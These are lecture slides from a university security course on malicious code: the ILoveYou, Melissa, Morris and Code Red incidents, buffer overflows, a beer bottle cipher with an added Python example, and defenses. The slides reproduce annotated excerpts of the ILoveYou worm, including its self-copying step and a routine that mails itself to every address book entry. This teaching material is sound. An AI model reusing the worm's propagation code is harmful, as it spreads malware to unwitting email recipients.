  1. Lecture 17: Malcode David Evans http://www.cs.virginia.edu/~evans From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/ CS588: Security and Privacy University of Virginia Computer Science

  2. Menu
  • Examination of ILoveYou Code
  • Malicious Code Taxonomy
  • Beer Bottle Deciphering (Eric & Michael)
  • Malcode Defenses Overview
  • Virus Scanners
  University of Virginia CS 588

  3. LoveLetter.VBS
  • Excerpts on the manifest
  • This 328-line program caused ~$10B in damage
  • How much work and smarts was required?

  4. Main Loop
  Annotations on the slide: Smart people would convey a more interesting message. Smart virus writers don’t include their contact information. This was smart – turn off the scripting timeout in the registry. (Dumb for Microsoft.)
  rem barok -loveletter(vbe) <i hate go to school>
  rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
  On Error Resume Next
  ...
  wscr.RegWrite "...Scripting Host\ Settings\Timeout", 0
  sub main()
  ...
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  ...
  spreadtoemail()
  ...
  end sub

  5. spreadtoemail (edited to fit)
  Annotations on the slide: Smart virus writers understand for loops. Smart virus writers can spell “mail”.
  sub spreadtoemail()
  for ctrlists=1 to mapi.AddressLists.Count
  set a=mapi.AddressLists(ctrlists)
  x=1
  for ctrentries=1 to a.AddressEntries.Count
  malead=a.AddressEntries(x)
  set male=out.CreateItem(0)
  male.Recipients.Add(malead)
  male.Subject = "ILOVEYOU"
  male.Body = "kindly check the attached LOVELETTER coming from me."
  male.Attachments.Add(dirsystem& "\LOVE-LETTER-FOR-YOU.TXT.vbs")
  male.Send
  x=x+1
  next
  next
  end sub

  6. (image only)

  7. Be Very Afraid...
  • When really dumb people with no resources write malicious programs, it costs $10B.
  • What would happen if smart people with resources wrote a malicious program?
  • See manifest links:
    • Two interesting scenarios answering this
    • James Gleick article

  8. Attacking Malicious Code
  • “Malicious Code” is a bad name
    • Code has no intent
    • Programmer’s intent doesn’t matter, what the code does matters
    • As networks get more programmable, accidentally harmful code will become common
  • We’ll use “malcode” (mal = bad)
    • It’s not a great name either...

  9. Taxonomy of Code
  All Code
    • Harmless Code (occasionally programs are actually useful, too)
    • Malcode
      • Created by Malicious Author
      • Accidental

  10. Taxonomy of Malcode [Stallings, p. 502]
  Malcode
    • Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
    • Independent: Insiders, Worms
  Self-Replicating: Viruses, Worms

  11. Worms and Viruses
  • People get into stupid arguments over whether something is a “worm” or a “virus”
    • Is the Internet a host program?
    • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
    • Is Outlook a host program for an email?
  • Similarly, for worms/viruses/Trojans
    • If the user must open it (e.g., ILoveYou), is it self-replicating?

  12. Trojan Horses
  • Greeks and Trojans at war
    • Eris (Discord), Paris, Aphrodite, Helen
  • Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.
  • Pretended to leave, left big wooden horse as gift
  • Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory.
  • Greeks jumped out, killed sentries, and let in Greek army.

  13. Modern Trojan Horses
  • User runs program that looks harmless
  • Program pretends to be “cool, dancing bears”, also erases your hard drive
  • Most attacks today are Trojan Horses
    • ILoveYou, Melissa, recent Microsoft attack, etc.
    • Rely on modern humans being as dumb as mythical Trojans
  • No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code

  14. Differences between Morris Worm 1988 and Melissa/ILoveYou 1999

  15. Vulnerabilities Exploited
  • Morris Worm:
    • Buffer overflow: fingerd uses gets
    • sendmail debug mode
    • Weak Unix passwords
  • Melissa:
    • Word enables macros by default, no limitations on macro behavior
  • ILoveYou:
    • Dumb people will run code attached to email
  • Code Red/Nimda:
    • Buffer overflow in IIS

  16. Buffer Overflows
  int i;
  int k;
  char s[64];
  gets (s);
  Stack diagram: s[64] and the other locals, then the Frame Pointer, then the Return Address
  Input more than 64 bits: gets just writes down the stack
    bit 65: address of bit 66 on stack
    bits 66-...: instructions ...

  17. Preventing Buffer Overflows
  • Use run-time checks on all memory references
    • Safe languages (CLU, Java, Eiffel, etc.)
    • Safe libraries for C (don’t use gets, strcpy, etc.)
  • Separate code and data segments
    • Make code segment unwritable (once application loaded), only allow jumps in code segment
  • Static analysis
    • Check binary or source code
  • But – about ½ of recent vulnerabilities are still buffer overflows!

  18. Replication Strategy
  • Morris Worm
    • Searched .forward files (should have used .rhosts) to find other hosts to attack
    • Used password guessing to break into other accounts
    • Used fingerd, sendmail vulnerabilities
  • Melissa/ILoveYou
    • Emails itself to entries in victim’s Outlook address book

  19. Damage
  • Morris Worm
    • Infected ~6000 computers (10% of Internet)
  • Melissa
    • Infected 1.2 Million machines in a few hours
  • ILoveYou
    • $10 Billion in damage
  • Nimda, CodeRed
    • ??

  20. Outcomes
  • Internet Worm (Robert Morris, Jr.)
    • 3 years suspended sentence (no jail time), $10,000 fine.
    • Current occupation
  • Melissa (David Smith) (~$80m damages)
    • Pleaded guilty, Dec 1999 (second successful prosecution of virus author), link to plea agreement on manifest
    • Hired by Rutgers as Computer Technician while awaiting sentencing
  • ILoveYou ($10B damages)
    • Released without penalty, no laws in Philippines

  21. Responses
  • Morris Worm
    • Disconnect from network
    • Disorganized, phone
    • Anonymous message (probably from Robert Morris) explaining how to disable the virus was not noticed or distributed
    • DARPA established CERT
  • Melissa
    • CERT Advisory, Eradicated quickly
    • But CERT had to rebuild Web server
  • ILoveYou
    • Many countries have since passed laws, Europe treaty announced last week

  22. Malcode Defenses
  • Prevent malcode from running
  • Limit damage it can do
  • Discourage attackers

  23. Malcode Defenses
  • Prevent malcode from running
    Virus scanners – recognize known malcode
    Firewalls – drop incoming packets
    Code signing (only run code from trusted sources)
    Education – make users smarter
  • Limit damage it can do
    Sandbox (“Playpen”) – run malcode in protected virtual machine
    Reference monitors – enforce policy on execution
    Intrusion Detection, System maintenance
  • Discourage attackers
    Legal – pass laws to penalize attackers
  (Schedule annotations on the slide: Today, Next Monday, Earlier, Your PS4’s, Dan Ortiz Weds)

  24. Deciphering Rivest’s Beer Bottle Cipher Michael Neve and Eric Peeters

  25. The beer bottle cipher

  26. The beer bottle cipher
  99 bottles of beer on the wall, 99 bottles of beer.
  Take one down, Pass it around,
  98 bottles of beer on the wall.

  27. Plaintext
  Represented by a number: A=01, B=02, …, a “space”=00
  Example: BEER IS LIFE = 020505180009190012090605
  1 digit = 1 bottle. Here, the plaintext has 24 bottles.

  28. The wall: K bottles of beer (diagram of the wall digits 5 3 8 5 … 9 8)

  29. K bottles of beer: multiply the wall (4 1 8 8 … 4 6 5) by (10*K+1) and keep only the K rightmost digits. (Bob: What could I do with the other beers???)

  30. Drink it!!!! (Bob: ???)
  The procedure is complicated enough that you probably should not be drinking beer when you try to do it.

  31. Modulus
  This is equivalent to writing: New_wall = old_wall * (10*K+1) mod 10^K
  Example: number on the wall = 537
  sing “3 bottles of beer”: move left-most bottle to right end, new number on wall = 375
  multiply by 31 (which is 10*3+1): result = 11625
  new number on wall = 625

  32. Inverted…
  Compute the multiplicative inverse H of (10*K+1) mod 10^K: H*(10*K+1) ≡ 1 mod 10^K
  Then: New_wall*H mod 10^K = old_wall
  Proof:
  New_wall = old_wall*(10*K+1) mod 10^K
  New_wall*H mod 10^K = old_wall*(10*K+1)*H mod 10^K
  New_wall*H mod 10^K = old_wall*1 mod 10^K
  New_wall*H mod 10^K = old_wall

  33. On the wall
  There is an encryption key, known as the “skull”.
  Wall+skull, keep only the K rightmost digits: New_wall = (old_wall + skull) mod 10^K
  Example: number on wall = 625
  sing “on the wall”: skull = 7972340074652439987611087
  sum = 7972340074652439987611712
  new number on wall = 712
  Inverted: (abs(new_wall – skull)) mod 10^K = old_wall

  34. Take one down: the wall 4 1 8 8 … 4 6 5 becomes 4 1 8 8 … 4 6, and the bottle taken down (5) is the bone. Don’t drink the bone… yet.

  35. The table: Pass it around. t empty (already…) glasses on the table (diagram: 2 4 5 5 7 8 3 8 8 3). New table = table*10 + bigbone.

  36. The table (diagram: 8 7 5 4 8 1 7 4 5 8 5)
  • Bigbone? It’s a t+1-digit number; each digit is the bone
  • The new table has t+1 digits
  • Repeat all steps until the wall is empty
  • Ciphertext = table

  37. Work with Budweiser??? We are not sure…

  38. Matlab program
  Example: beer2('BUDWEISER','1654324617671695465416876154617861');
  First Wall : 022104230509190518
  "18 bottles of beer"
  Wall : 221042305091905180
  New Wall : 008657221634837580
  "on the wall"
  New Wall : 474074097789455441
  "take one down"
  Bone : 1
  New Wall : 47407409778945544
  "pass it around"
  Big Bone : 1
  10 x table : 0
  New Table : 1
  "17 bottles of beer"
  Wall : 74074097789455444
  New Wall : 66670721996880924

  39. Example Outcomes: Budweiser
  Table : 8316199728055301369
  unbeer2(cipher,'1654324617671695465416876154617861');
  New Table : 731619972805530137
  Bone : 9
  "1 bottles of beer"
  Wall : 8
  New Table : 65384219502775236
  Bone : 7
  …
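The whole procedure of slides 27 through 39, as an added Python example that is not the authors' Matlab code: encryption runs "K bottles of beer", "on the wall", "take one down" and "pass it around" until the wall is empty, and decryption undoes the rounds in reverse order. Two assumptions are mine: the decryptor is given the plaintext digit count (the slides do not say how unbeer2 learns it), and "on the wall" is undone with modular subtraction, which never goes negative.

```python
# Added example; plaintext is letters and spaces only (A=01 ... Z=26, space=00).
SKULL = 1654324617671695465416876154617861  # the skull used on slide 38

def letters_to_digits(text):
    """A=01 ... Z=26, space=00 (slide 27); one digit is one bottle."""
    return "".join("%02d" % (0 if ch == " " else ord(ch) - 64) for ch in text.upper())

def digits_to_letters(digits):
    """Inverse of letters_to_digits: two digits per character."""
    vals = [int(digits[i:i + 2]) for i in range(0, len(digits), 2)]
    return "".join(" " if v == 0 else chr(64 + v) for v in vals)

def bottles_of_beer(wall, k):
    """'K bottles of beer': move the leftmost bottle to the right end, then
    multiply by 10K+1 and keep the K rightmost digits (slide 31)."""
    rotated = int(wall[1:] + wall[0])
    return "%0*d" % (k, rotated * (10 * k + 1) % 10 ** k)

def on_the_wall(wall, k, skull):
    """'On the wall': add the skull, keep the K rightmost digits (slide 33)."""
    return "%0*d" % (k, (int(wall) + skull) % 10 ** k)

def beer_encrypt(plaintext, skull):
    wall, table, passed = letters_to_digits(plaintext), 0, 0
    while wall:                                   # repeat until the wall is empty
        k = len(wall)
        wall = on_the_wall(bottles_of_beer(wall, k), k, skull)
        wall, bone = wall[:-1], wall[-1]          # "take one down": the bone
        bigbone = int(bone * (passed + 1))        # t+1 copies of the bone digit
        table = table * 10 + bigbone              # "pass it around"
        passed += 1
    return table                                  # ciphertext = the table

def beer_decrypt(table, skull, n_digits):
    """Undo the rounds last-first; n_digits is the plaintext length in digits
    (assumed known to the decryptor)."""
    wall = ""
    for k in range(1, n_digits + 1):
        bone = table % 10                         # the rightmost glass on the table
        table = (table - int(str(bone) * (n_digits - k + 1))) // 10
        wall = "%0*d" % (k, (int(wall + str(bone)) - skull) % 10 ** k)
        h = pow(10 * k + 1, -1, 10 ** k)          # inverse of 10K+1 (slide 32)
        s = "%0*d" % (k, int(wall) * h % 10 ** k)
        wall = s[-1] + s[:-1]                     # move the right bottle back to the left
    return digits_to_letters(wall)
```

The first-round values for BUDWEISER (the rotated wall times 181 giving 008657221634837580, then 474074097789455441 after adding the skull) match the Matlab trace on slide 38.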

  40. Virus Scanners

  41. Virus Scanners
  • Compare code to a database of known malicious code
    • Smart authors create self-mutating viruses
  • Reasonably useful in days of “sneaker” net (viruses spread on floppies)
  • Reasonably useless when viruses spread as fast as email

  42. Virus Spreading
  • Read email every hour
  • Everyone’s address book contains 50 people
  • Infects 300M people in 6 hours! (For more complex model, see Wang/Knight/Elder paper on manifest.)

  43. Code Red (image)

  44. Code Red (image)

  45. What Virus Scanner Peddlers Do http://security.norton.com/

  46. First, it tells you to lower your security settings to allow ActiveX.

  47. Always Click “Yes”
  During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.

  48. (image only)

  49. What it Should Do
  • Tell people who have ActiveX turned off, “Good Job”
  • Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!

  50. Malcode Summary
  • Best defense is education
  • Next best defense is a good offense
    • Tough legal penalties for convicted attackers
    • Doesn’t work against motivated foreign governments
  • Some Technical defenses next Monday
    • Virus Scanners
    • Firewalls, Intrusion Detection
    • Reference Monitors, Proof-Carrying Code
